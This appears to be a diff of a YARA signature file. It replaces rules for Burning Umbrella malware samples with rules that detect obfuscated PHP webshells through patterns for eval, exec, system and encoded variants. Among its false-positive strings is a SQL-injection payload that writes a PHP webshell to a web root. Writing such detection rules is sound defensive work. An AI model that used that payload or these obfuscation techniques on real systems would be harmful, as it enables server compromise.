+		$php_new3 = "<script language=\"php" nocase wide ascii
+		$o1 = "chr(" nocase wide ascii
+		$o2 = "chr (" nocase wide ascii
+		$o3 = "goto" fullword nocase wide ascii
+		$o4 = "\\x9" wide ascii
+		$o5 = "\\x3" wide ascii
+		$o6 = "\\61" wide ascii
+		$o7 = "\\44" wide ascii
+		$o8 = "\\112" wide ascii
+		$o9 = "\\120" wide ascii
+		$fp1 = "$goto" wide ascii
+		$cpayload1 = /\beval[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload2 = /\bexec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload3 = /\bshell_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload4 = /\bpassthru[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload5 = /\bsystem[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload6 = /\bpopen[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload7 = /\bproc_open[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload8 = /\bpcntl_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload9 = /\bassert[\n\t ]{0,500}\([^)0]/ nocase wide ascii
+		$cpayload10 = /\bpreg_replace[\n\t ]{0,500}\([^\)]{1,100}\/[ismxADSUXju]{0,11}(e|\\x65)/ nocase wide ascii
+		$cpayload12 = /\bmb_ereg_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
+		$cpayload13 = /\bmb_eregi_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
+		$cpayload20 = /\bcreate_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload21 = /\bReflectionFunction[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload22 = /fetchall\(PDO::FETCH_FUNC[\n\t ]{0,500}[,}\)]/ nocase wide ascii
+		$m_cpayload_preg_filter1 = /\bpreg_filter[\n\t ]{0,500}(\([^\)]|\/\*)/ nocase wide ascii
+		$m_cpayload_preg_filter2 = "'|.*|e'" nocase wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		not ( any of ( $gfp* ) ) and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( not $fp1 and ( ( filesize < 20KB and ( ( #o1 + #o2 ) > 50 or #o3 > 10 or ( #o4 + #o5 + #o6 + #o7 + #o8 + #o9 ) > 20 ) ) or ( filesize < 200KB and ( ( #o1 + #o2 ) > 200 or #o3 > 30 or ( #o4 + #o5 + #o6 + #o7 + #o8 + #o9 ) > 30 ) ) ) ) and ( any of ( $cpayload* ) or all of ( $m_cpayload_preg_filter* ) )
 }
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_11 : FILE
+rule SIGNATURE_BASE_WEBSHELL_PHP_OBFUSC_Encoded : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9762c68c-4d69-5d38-aaf4-0048e7404147"
-		date = "2018-05-04"
-		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L165-L178"
+		description = "PHP webshell obfuscated by encoding"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "134c1189-1b41-58d5-af66-beaa4795a704"
+		date = "2021-04-18"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L1141-L1192"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "847681b3e9d4fc38c483663f5a7e16e7f8f95cfa77728d7316edbe6fbf5fe2c1"
-		score = 75
-		quality = 85
+		hash = "119fc058c9c5285498a47aa271ac9a27f6ada1bf4d854ccd4b01db993d61fc52"
+		hash = "d5ca3e4505ea122019ea263d6433221030b3f64460d3ce2c7d0d63ed91162175"
+		hash = "8a1e2d72c82f6a846ec066d249bfa0aaf392c65149d39b7b15ba19f9adc3b339"
+		logic_hash = "c2a88e48374f949fcc9c14b773f7709c96b3147d1982ae9721708474ee5a3dcd"
+		score = 70
+		quality = -64
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "278e9d130678615d0fee4d7dd432f0dda6d52b0719649ee58cbdca097e997c3f"
+		importance = 70
 
 	strings:
-		$s1 = "Resume.app/Contents/Java/Resume.jarPK" fullword ascii
+		$enc_eval1 = /(e|\\x65|\\101)(\\x76|\\118)(a|\\x61|\\97)(l|\\x6c|\\108)(\(|\\x28|\\40)/ wide ascii nocase
+		$enc_eval2 = /(\\x65|\\101)(v|\\x76|\\118)(a|\\x61|\\97)(l|\\x6c|\\108)(\(|\\x28|\\40)/ wide ascii nocase
+		$enc_assert1 = /(a|\\97|\\x61)(\\115|\\x73)(s|\\115|\\x73)(e|\\101|\\x65)(r|\\114|\\x72)(t|\\116|\\x74)(\(|\\x28|\\40)/ wide ascii nocase
+		$enc_assert2 = /(\\97|\\x61)(s|\\115|\\x73)(s|\\115|\\x73)(e|\\101|\\x65)(r|\\114|\\x72)(t|\\116|\\x74)(\(|\\x28|\\40)/ wide ascii nocase
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
 
 	condition:
-		uint16( 0 ) == 0x4b50 and filesize < 700KB and 1 of them
+		filesize < 700KB and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and any of ( $enc* )
 }
-
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_12 : FILE
+rule SIGNATURE_BASE_WEBSHELL_PHP_OBFUSC_Encoded_Mixed_Dec_And_Hex : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "805a00e7-2959-53d8-b769-0f8e54e1bbd5"
-		date = "2018-05-04"
-		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L180-L201"
+		description = "PHP webshell obfuscated by encoding of mixed hex and dec"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "9ae920e2-17c8-58fd-8566-90d461a54943"
+		date = "2021-04-18"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L1194-L1250"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "31798a39d10bfa4520d91e1f555302e9ac4e38d90f8bc27376a5e7e1ccfcc5e1"
+		hash = "0e21931b16f30b1db90a27eafabccc91abd757fa63594ba8a6ad3f477de1ab1c"
+		hash = "929975272f0f42bf76469ed89ebf37efcbd91c6f8dac1129c7ab061e2564dd06"
+		hash = "88fce6c1b589d600b4295528d3fcac161b581f739095b99cd6c768b7e16e89ff"
+		hash = "883f48ed4e9646da078cabf6b8b4946d9f199660262502650f76450ecf60ddd5"
+		hash = "50389c3b95a9de00220fc554258fda1fef01c62dad849e66c8a92fc749523457"
+		hash = "c4ab4319a77b751a45391aa01cde2d765b095b0e3f6a92b0b8626d5c7e3ad603"
+		hash = "df381f04fca2522e2ecba0f5de3f73a655d1540e1cf865970f5fa3bf52d2b297"
+		hash = "401388d8b97649672d101bf55694dd175375214386253d0b4b8d8d801a89549c"
+		hash = "99fc39a12856cc1a42bb7f90ffc9fe0a5339838b54a63e8f00aa98961c900618"
+		hash = "fb031af7aa459ee88a9ca44013a76f6278ad5846aa20e5add4aeb5fab058d0ee"
+		hash = "dd5d8a9b4bb406e0b8f868165a1714fe54ffb18e621582210f96f6e5ae850b33"
+		hash = "0ff05e6695074f98b0dee6200697a997c509a652f746d2c1c92c0b0a0552ca47"
+		logic_hash = "d9b4d224d43915cf08050c173627b314c3e41a30ecfffe28038281eadc114e51"
 		score = 75
-		quality = 85
+		quality = 17
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b9aba520eeaf6511877c1eec5f7d71e0eea017312a104f30d3b8f17c89db47e8"
+		importance = 70
 
 	strings:
-		$s1 = "%SystemRoot%\\System32\\qmgr.dll" fullword ascii
-		$s2 = "rundll32.exe %s,Startup" fullword ascii
-		$s3 = "nvsvcs.dll" fullword wide
-		$s4 = "SYSTEM\\CurrentControlSet\\services\\BITS\\Parameters" fullword ascii
-		$s5 = "http://www.sginternet.net 0" fullword ascii
-		$s6 = "Microsoft Corporation. All rights reserved." fullword wide
+		$mix = /['"](\w|\\x?[0-9a-f]{2,3})[\\x0-9a-f]{2,20}\\\d{1,3}[\\x0-9a-f]{2,20}\\x[0-9a-f]{2}\\/ wide ascii nocase
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 80KB and ( pe.exports ( "SvcServiceMain" ) and 5 of them )
+		filesize < 700KB and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and any of ( $mix* )
 }
-
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_13 : FILE
+rule SIGNATURE_BASE_WEBSHELL_PHP_OBFUSC_Tiny : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "38c73425-bbdd-5b74-8ad4-5e0052039dd8"
-		date = "2018-05-04"
-		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L203-L215"
+		description = "PHP webshell obfuscated"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d78e495f-54d2-5f5f-920f-fb6612afbca3"
+		date = "2021-01-12"
+		modified = "2024-03-11"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L1252-L1347"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8cc611685a822e0484146a08f4ebc2fa8dd260dc8627929333060696d8dc35ce"
+		hash = "b7b7aabd518a2f8578d4b1bc9a3af60d155972f1"
+		hash = "694ec6e1c4f34632a9bd7065f73be473"
+		hash = "5c871183444dbb5c8766df6b126bd80c624a63a16cc39e20a0f7b002216b2ba5"
+		logic_hash = "993f1c98362dcbc207c6ceacb116a27d44505dc6dfa1874def780af50422e1b9"
 		score = 75
-		quality = 85
+		quality = -90
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d31374adc0b96a8a8b56438bbbc313061fd305ecee32a12738dd965910c8890f"
-		hash2 = "c74a8e6c88f8501fb066ae07753efe8d267afb006f555811083c51c7f546cb67"
+		importance = 70
+
+	strings:
+		$obf1 = /\w'\.'\w/ wide ascii
+		$obf2 = /\w\"\.\"\w/ wide ascii
+		$obf3 = "].$" wide ascii
+		$gfp1 = "eval(\"return [$serialised_parameter"
+		$gfp2 = "$this->assert(strpos($styles, $"
+		$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
+		$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
+		$gfp5 = "$_POST[partition_by]($_POST["
+		$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
+		$gfp7 = "The above example code can be easily exploited by passing in a string such as"
+		$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
+		$gfp9 = "?p4yl04d=UNION%20SELECT%20'<?%20system($_GET['command']);%20?>',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
+		$gfp10 = "[][}{;|]\\|\\\\[+=]\\|<?=>?"
+		$gfp11 = "(eval (getenv \"EPROLOG\")))"
+		$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
+		$cpayload1 = /\beval[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload2 = /\bexec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload3 = /\bshell_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload4 = /\bpassthru[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload5 = /\bsystem[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload6 = /\bpopen[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload7 = /\bproc_open[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload8 = /\bpcntl_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload9 = /\bassert[\n\t ]{0,500}\([^)0]/ nocase wide ascii
+		$cpayload10 = /\bpreg_replace[\n\t ]{0,500}\([^\)]{1,100}\/[ismxADSUXju]{0,11}(e|\\x65)/ nocase wide ascii
+		$cpayload12 = /\bmb_ereg_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
+		$cpayload13 = /\bmb_eregi_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
+		$cpayload20 = /\bcreate_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload21 = /\bReflectionFunction[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload22 = /fetchall\(PDO::FETCH_FUNC[\n\t ]{0,500}[,}\)]/ nocase wide ascii
+		$m_cpayload_preg_filter1 = /\bpreg_filter[\n\t ]{0,500}(\([^\)]|\/\*)/ nocase wide ascii
+		$m_cpayload_preg_filter2 = "'|.*|e'" nocase wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and pe.imphash ( ) == "75f201aa8b18e1c4f826b2fe0963b84f"
+		filesize < 500 and not ( any of ( $gfp* ) ) and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( any of ( $cpayload* ) or all of ( $m_cpayload_preg_filter* ) ) and ( ( #obf1 + #obf2 ) > 2 or #obf3 > 10 )
 }
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_14 : FILE
+rule SIGNATURE_BASE_WEBSHELL_PHP_OBFUSC_Str_Replace : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a2b3a4bb-ca60-5dc2-8124-17e654e326b8"
-		date = "2018-05-04"
-		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L217-L231"
+		description = "PHP webshell which eval()s obfuscated string"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "1f5b93c9-bdeb-52c7-a99a-69869634a574"
+		date = "2021-01-12"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L1349-L1404"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "37515683804e9aa076a588048713b420501b2aaf6b8617501ef550484abd1c03"
+		hash = "691305753e26884d0f930cda0fe5231c6437de94"
+		hash = "7efd463aeb5bf0120dc5f963b62463211bd9e678"
+		hash = "fb655ddb90892e522ae1aaaf6cd8bde27a7f49ef"
+		hash = "d1863aeca1a479462648d975773f795bb33a7af2"
+		hash = "4d31d94b88e2bbd255cf501e178944425d40ee97"
+		hash = "e1a2af3477d62a58f9e6431f5a4a123fb897ea80"
+		logic_hash = "74fb86a7ee7342ede9f49ef004a92fb7bdf06ca62f8e8f0ea1c6adcff96bcb2d"
 		score = 75
-		quality = 85
+		quality = 46
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "388ef4b4e12a04eab451bd6393860b8d12948f2bce12e5c9022996a9167f4972"
+		importance = 70
 
 	strings:
-		$s1 = "C:\\tmp\\Google_updata.exe" fullword ascii
+		$payload1 = "str_replace" fullword wide ascii
+		$payload2 = "function" fullword wide ascii
+		$goto = "goto" fullword wide ascii
+		$chr1 = "\\61" wide ascii
+		$chr2 = "\\112" wide ascii
+		$chr3 = "\\120" wide ascii
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 40KB and 1 of them
+		filesize < 300KB and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and any of ( $payload* ) and #goto > 1 and ( #chr1 > 10 or #chr2 > 10 or #chr3 > 10 )
 }
-
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_15 : FILE
+rule SIGNATURE_BASE_WEBSHELL_PHP_OBFUSC_Fopo : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4dc840c1-e6fa-5b21-bfcd-ef07cd85272a"
-		date = "2018-05-04"
-		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L233-L248"
+		description = "PHP webshell which eval()s obfuscated string"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "a298e99d-1ba8-58c8-afb9-fc988ea91e9a"
+		date = "2021-01-12"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L1406-L1466"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8541231fe1e48d7130aed64eee964f8eda6792b5dd3e708b98e9cc6f1f620cd0"
+		hash = "fbcff8ea5ce04fc91c05384e847f2c316e013207"
+		hash = "6da57ad8be1c587bb5cc8a1413f07d10fb314b72"
+		hash = "a698441f817a9a72908a0d93a34133469f33a7b34972af3e351bdccae0737d99"
+		logic_hash = "076c0c256e5951cdcb2b7bc55030f55bec48c1bea953b8bd85559a3230e387ae"
 		score = 75
-		quality = 85
+		quality = 40
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "be6bea22e909bd772d21647ffee6d15e208e386e8c3c95fd22816c6b94196ae8"
-		hash2 = "72a8fa454f428587d210cba0e74735381cd0332f3bdcbb45eecb7e271e138501"
-		hash3 = "9cc38ea106efd5c8e98c2e8faf97c818171c52fa3afa0c4c8f376430fa556066"
-		hash4 = "1a4a64f01b101c16e8b5928b52231211e744e695f125e056ef7a9412da04bb91"
-		hash5 = "3cd42e665e21ed4815af6f983452cbe7a4f2ac99f9ea71af4480a9ebff5aa048"
+		importance = 70
+
+	strings:
+		$payload = /(\beval[\t ]{0,500}\([^)]|\bassert[\t ]{0,500}\([^)])/ nocase wide ascii
+		$one1 = "7QGV2YWwo" wide ascii
+		$one2 = "tAZXZhbC" wide ascii
+		$one3 = "O0BldmFsK" wide ascii
+		$one4 = "sAQABlAHYAYQBsACgA" wide ascii
+		$one5 = "7AEAAZQB2AGEAbAAoA" wide ascii
+		$one6 = "OwBAAGUAdgBhAGwAKA" wide ascii
+		$two1 = "7QGFzc2VydC" wide ascii
+		$two2 = "tAYXNzZXJ0K" wide ascii
+		$two3 = "O0Bhc3NlcnQo" wide ascii
+		$two4 = "sAQABhAHMAcwBlAHIAdAAoA" wide ascii
+		$two5 = "7AEAAYQBzAHMAZQByAHQAKA" wide ascii
+		$two6 = "OwBAAGEAcwBzAGUAcgB0ACgA" wide ascii
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and pe.imphash ( ) == "cc33b1500354cf785409a3b428f7cd2a"
+		filesize < 3000KB and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and $payload and ( any of ( $one* ) or any of ( $two* ) )
 }
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_16 : FILE
+rule SIGNATURE_BASE_WEBSHELL_PHP_Gzinflated : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8b1970bd-571e-5c53-9170-1605c69d9d6d"
-		date = "2018-05-04"
-		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L250-L263"
+		description = "PHP webshell which directly eval()s obfuscated string"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "9cf99ae4-9f7c-502f-9294-b531002953d6"
+		date = "2021-01-12"
+		modified = "2023-07-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L1468-L1541"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2d0ee163e7f6f04bfe6941575d0916e18ce2e5c2426e0af326c9567560df3122"
+		hash = "49e5bc75a1ec36beeff4fbaeb16b322b08cf192d"
+		hash = "6f36d201cd32296bad9d5864c7357e8634f365cc"
+		hash = "ab10a1e69f3dfe7c2ad12b2e6c0e66db819c2301"
+		hash = "a6cf337fe11fe646d7eee3d3f09c7cb9643d921d"
+		hash = "07eb6634f28549ebf26583e8b154c6a579b8a733"
+		logic_hash = "d2edb7050c986a00889fd01b709ec0aa1409ce2e40a15b7942562d12596b190e"
 		score = 75
-		quality = 85
+		quality = 32
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "58bb3859e02b8483e9f84cc56fbd964486e056ef28e94dd0027d361383cc4f4a"
+		importance = 70
 
 	strings:
-		$s1 = "http://netimo.net 0" fullword ascii
+		$payload2 = /eval\s?\(\s?("\?>".)?gzinflate\s?\(\s?base64_decode\s?\(/ wide ascii nocase
+		$payload4 = /eval\s?\(\s?("\?>".)?gzuncompress\s?\(\s?(base64_decode|gzuncompress)/ wide ascii nocase
+		$payload6 = /eval\s?\(\s?("\?>".)?gzdecode\s?\(\s?base64_decode\s?\(/ wide ascii nocase
+		$payload7 = /eval\s?\(\s?base64_decode\s?\(/ wide ascii nocase
+		$payload8 = /eval\s?\(\s?pack\s?\(/ wide ascii nocase
+		$fp1 = "YXBpLnRlbGVncmFtLm9"
+		$gfp1 = "eval(\"return [$serialised_parameter"
+		$gfp2 = "$this->assert(strpos($styles, $"
+		$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
+		$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
+		$gfp5 = "$_POST[partition_by]($_POST["
+		$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
+		$gfp7 = "The above example code can be easily exploited by passing in a string such as"
+		$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
+		$gfp9 = "?p4yl04d=UNION%20SELECT%20'<?%20system($_GET['command']);%20?>',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
+		$gfp10 = "[][}{;|]\\|\\\\[+=]\\|<?=>?"
+		$gfp11 = "(eval (getenv \"EPROLOG\")))"
+		$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them
+		filesize < 700KB and not ( any of ( $gfp* ) ) and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and 1 of ( $payload* ) and not any of ( $fp* )
 }
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_17 : FILE
+rule SIGNATURE_BASE_WEBSHELL_PHP_OBFUSC_3 : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d79d3f65-f27c-582b-9258-7c84dc7682a6"
-		date = "2018-05-04"
-		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L265-L284"
+		description = "PHP webshell which eval()s obfuscated string"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f2017e6f-0623-53ff-aa26-a479f3a02024"
+		date = "2021-04-17"
+		modified = "2024-12-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L1543-L1849"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ca1dc3a03926af15527d2cb95c87457c285891d42a0aa642f49414153bcfc39e"
-		score = 75
-		quality = 85
+		hash = "11bb1fa3478ec16c00da2a1531906c05e9c982ea"
+		hash = "d6b851cae249ea6744078393f622ace15f9880bc"
+		hash = "14e02b61905cf373ba9234a13958310652a91ece"
+		hash = "6f97f607a3db798128288e32de851c6f56e91c1d"
+		logic_hash = "aba86f6d8458bb119b9e495e6e77c1b89855bde31b12395a4d656878c5152932"
+		score = 70
+		quality = -198
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
